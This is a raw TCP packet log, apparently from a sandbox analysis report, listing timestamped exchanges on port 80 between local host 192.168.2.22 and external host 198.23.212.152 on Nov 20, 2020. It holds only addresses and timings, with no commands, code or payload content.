                                              Nov 20, 2020 13:47:41.042009115 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042073965 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042118073 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042155981 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042195082 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042232037 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042243958 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042272091 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042279959 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042310953 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042315006 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042319059 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042324066 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042327881 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042347908 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042362928 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042395115 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042399883 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042437077 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042439938 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042478085 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042495966 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042516947 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042526960 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042556047 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042577982 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042593002 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042612076 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042630911 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042634964 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042681932 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.045330048 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163393021 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163455963 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163505077 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163544893 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163583040 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163620949 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163623095 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163661957 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163661957 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163678885 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163700104 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163714886 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163744926 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163747072 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163791895 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163805962 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163829088 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163841963 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163867950 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163881063 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163906097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163921118 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163944006 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163948059 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.163988113 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.163994074 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164030075 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164038897 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164081097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164082050 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164122105 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164130926 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164158106 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164172888 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164196968 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164199114 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164235115 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164252043 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164272070 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164289951 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164310932 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164323092 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164349079 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164361954 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164395094 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164397955 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164436102 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164450884 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164473057 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164474010 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164510965 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164525032 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164549112 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164561987 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164586067 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164587975 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164623976 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164637089 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164659977 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.164673090 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.164710045 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.167910099 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.286855936 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286904097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286922932 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286937952 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286952972 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286968946 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286983967 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.286999941 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287003040 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287020922 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287025928 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287029982 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287036896 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287048101 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287053108 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287066936 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287067890 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287082911 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287082911 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287100077 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287101984 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287112951 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287115097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287131071 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287132978 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287148952 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287151098 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287161112 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287167072 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.287185907 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.287204027 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288336992 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288397074 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288405895 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288438082 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288445950 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288464069 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288487911 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288494110 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288506985 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288522959 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288536072 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288539886 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288568974 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288583040 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288587093 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288606882 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288614035 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288646936 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288650990 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288672924 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288697004 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288698912 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288716078 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288733006 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288738966 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288749933 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288765907 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288777113 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288785934 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288793087 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288801908 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288810968 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288820028 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288827896 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288840055 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288844109 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288858891 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288858891 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288875103 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288878918 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288891077 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288894892 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288909912 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288919926 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288927078 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288930893 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288943052 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288950920 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288959026 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288966894 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.288975000 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288990021 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.288994074 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.289007902 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.289027929 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.289340973 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.405868053 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.405920982 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.405958891 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.406002045 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.406003952 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.406024933 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.406044960 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.406060934 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.406085014 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.406095028 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.406120062 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.406125069 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.406157017 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.406160116 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.406199932 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408479929 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408529997 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408545971 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408566952 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408569098 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408607006 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408611059 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408649921 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408655882 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408684015 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408693075 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408719063 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408721924 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408755064 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408757925 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408787966 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408802032 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408828974 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408828974 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408854008 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408864021 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408885956 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408901930 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408905983 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408946037 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408955097 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.408978939 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.408981085 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409013987 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409018993 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409048080 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409056902 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409080982 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409081936 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409116983 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409120083 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409152031 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409161091 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409185886 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409193993 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409231901 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409235001 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409265995 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409271955 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409300089 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409321070 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409334898 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409339905 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409368038 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409377098 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409399986 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409430027 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409466982 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409470081 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409498930 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409519911 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409538031 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409540892 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409579992 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409590006 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409615040 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409621954 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409650087 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409667015 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409682035 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409684896 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409718037 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409727097 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409751892 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409765959 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409785986 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409807920 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409832001 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409837961 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409868956 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409887075 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409903049 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409919977 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409938097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.409940958 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.409990072 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.411031008 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.524099112 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524156094 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524185896 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524224043 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524261951 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524300098 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524331093 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.524358034 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524373055 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.524398088 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.524399996 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.524435997 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.524507046 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528289080 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528347015 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528363943 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528387070 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528388977 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528425932 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528431892 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528465033 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528469086 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528502941 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528517008 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528542042 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528551102 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528592110 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528670073 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528721094 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.528913975 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.528956890 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529073000 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529115915 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529169083 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529171944 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529172897 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529208899 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529213905 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529248953 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529252052 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529287100 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529289961 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529326916 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529330015 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529366016 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529367924 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529403925 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529453039 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529494047 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529494047 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529529095 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529531002 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529567957 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529577971 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529618979 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529622078 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529659033 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529659033 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529694080 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529697895 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529736042 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529737949 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529771090 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529772997 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529808998 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529812098 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529848099 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529850006 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529889107 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529897928 CET8049167198.23.212.152192.168.2.22
